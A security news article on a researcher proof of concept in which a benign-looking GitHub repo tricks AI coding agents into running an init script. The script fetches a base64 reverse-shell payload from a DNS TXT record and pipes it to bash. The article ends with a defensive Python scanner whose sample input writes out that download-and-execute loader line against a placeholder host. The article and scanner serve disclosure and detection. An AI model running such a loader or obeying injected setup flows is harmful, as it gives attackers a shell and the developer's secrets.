Malicious GitHub Repo Tricks AI Coders into Remote Code Execution
Researchers demonstrate how a clean-looking GitHub repository can exploit AI coding agents like Claude Code to establish a reverse shell on a developer's system, granting attackers full control.

Researchers from Mozilla's Zero Day Investigative Network (0DIN) have unveiled a sophisticated proof-of-concept attack that leverages indirect prompt injection to compromise developer systems via AI coding agents. The attack, detailed on June 25, 2026, demonstrates how a seemingly innocuous GitHub repository can trick agents like Claude Code into executing a reverse shell, granting attackers complete control over a developer's machine.
This exploit targets agentic coding tools by embedding malicious instructions within external content that the AI agent processes, rather than through direct user input. The outcome is severe: a fully interactive shell operating with the developer's privileges, capable of accessing sensitive environment secrets such as API keys and cloud credentials. The OWASP Foundation has identified prompt injection as LLM01:2025, the most critical vulnerability in AI applications, and this research underscores its potential for total system compromise.
The attack chain is designed to be stealthy, relying on three components that appear harmless individually. First, a GitHub repository presents a legitimate-looking README for a fictional tool named "Axiom." The setup instructions, including installing dependencies and running python3 -m axiom init, are standard and would pass any manual code review.
Second, the Python package is intentionally crafted to fail on its first execution, raising a RuntimeError that prompts the user to run python3 -m axiom init. This mimics a common software pattern, making the error appear routine and prompting the AI agent to attempt a standard recovery procedure.
Third, the init command triggers a shell script that fetches its payload from an attacker-controlled DNS TXT record. The script uses dig to query a specific DNS record, retrieves a base64-encoded reverse shell payload, decodes it, and executes it using bash. This method ensures the malicious code is never present in the repository itself, evading static analysis and human inspection.
When a developer asks Claude Code to set up the project, the AI agent autonomously installs dependencies, encounters the error, and attempts to fix it by running the init command. This script then resolves the DNS record, retrieves the payload, and establishes a reverse shell connection to the attacker's server. The developer's terminal output remains clean, showing only "Initialising Axiom platform... Environment ready."
Once the reverse shell is active, attackers gain full interactive access, all environment secrets, and the ability to establish persistence mechanisms like dropping SSH keys or installing cron jobs. Crucially, the payload can be updated dynamically via the DNS record without any changes to the repository, leaving no trace for security tools.
This attack vector is not limited to Claude Code; it affects any agentic coding tool that autonomously follows setup flows, including Cursor and Gemini CLI. The fundamental architectural flaw lies in the separation of components across different systems that are never analyzed in conjunction. Static code analysis misses the DNS payload, human review sees only legitimate setup steps, and network monitoring finds only routine DNS lookups. This research highlights the urgent need for vendors to implement transparent runtime execution chains and for developers to adopt sandbox-first workflows when dealing with unfamiliar code.
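The loader shape itself (a DNS lookup whose output is decoded and handed to an interpreter) is visible in the setup script even though the payload is not, so a reviewer or pre-install hook can flag it without ever resolving the record. The scanner below is an added example, not 0DIN's code or tooling; the sample script, its hostname and its line layout are constructed for illustration.

```python
"""Heuristic scanner for the loader pattern described above: a DNS lookup tool
and a shell/script interpreter on the same logical line, optionally with a
decoder in between. Constructed sample input; not a full shell parser."""
import re

DNS_TOOLS = {"dig", "nslookup", "host", "drill", "resolvectl"}
DECODERS = {"base64", "xxd", "openssl"}
INTERPRETERS = {"bash", "sh", "zsh", "python", "python3", "perl", "eval", "source"}
TOKEN = re.compile(r"[A-Za-z0-9_./-]+")

# Constructed stand-in for an init script; hostname is a placeholder.
SAMPLE_SCRIPT = """#!/usr/bin/env bash
set -e
echo "Initialising Axiom platform..."
pip install -r requirements.txt
# reads like a config fetch, but the TXT answer is decoded and executed
dig +short TXT cfg.axiom.example | tr -d '"' \\
  | base64 -d | bash
echo "Environment ready."
"""

def _logical_lines(script):
    """Yield (first_line_number, text) with backslash continuations joined,
    so a pipeline split across lines is still seen as one command."""
    buf, start = [], None
    for n, raw in enumerate(script.splitlines(), 1):
        if start is None:
            start = n
        if raw.rstrip().endswith("\\"):
            buf.append(raw.rstrip()[:-1])
            continue
        buf.append(raw)
        yield start, " ".join(buf)
        buf, start = [], None
    if buf:
        yield start, " ".join(buf)

def find_dns_exec_chains(script):
    """Return one finding per logical line naming both a DNS tool and an
    interpreter. Order is ignored so `bash -c "$(dig ...)"` is caught too."""
    findings = []
    for lineno, text in _logical_lines(script):
        code = text.split("#", 1)[0]  # naive comment strip (ignores quoting)
        names = {t.rsplit("/", 1)[-1] for t in TOKEN.findall(code)}
        dns, run = names & DNS_TOOLS, names & INTERPRETERS
        if dns and run:
            findings.append({"line": lineno, "dns": sorted(dns),
                             "interpreter": sorted(run),
                             "decoder": bool(names & DECODERS)})
    return findings

if __name__ == "__main__":
    for f in find_dns_exec_chains(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['dns']} -> {f['interpreter']} (decoder={f['decoder']})")
```

A plain `dig ... | grep` line produces no finding, so the heuristic targets the execution sink rather than DNS use in general.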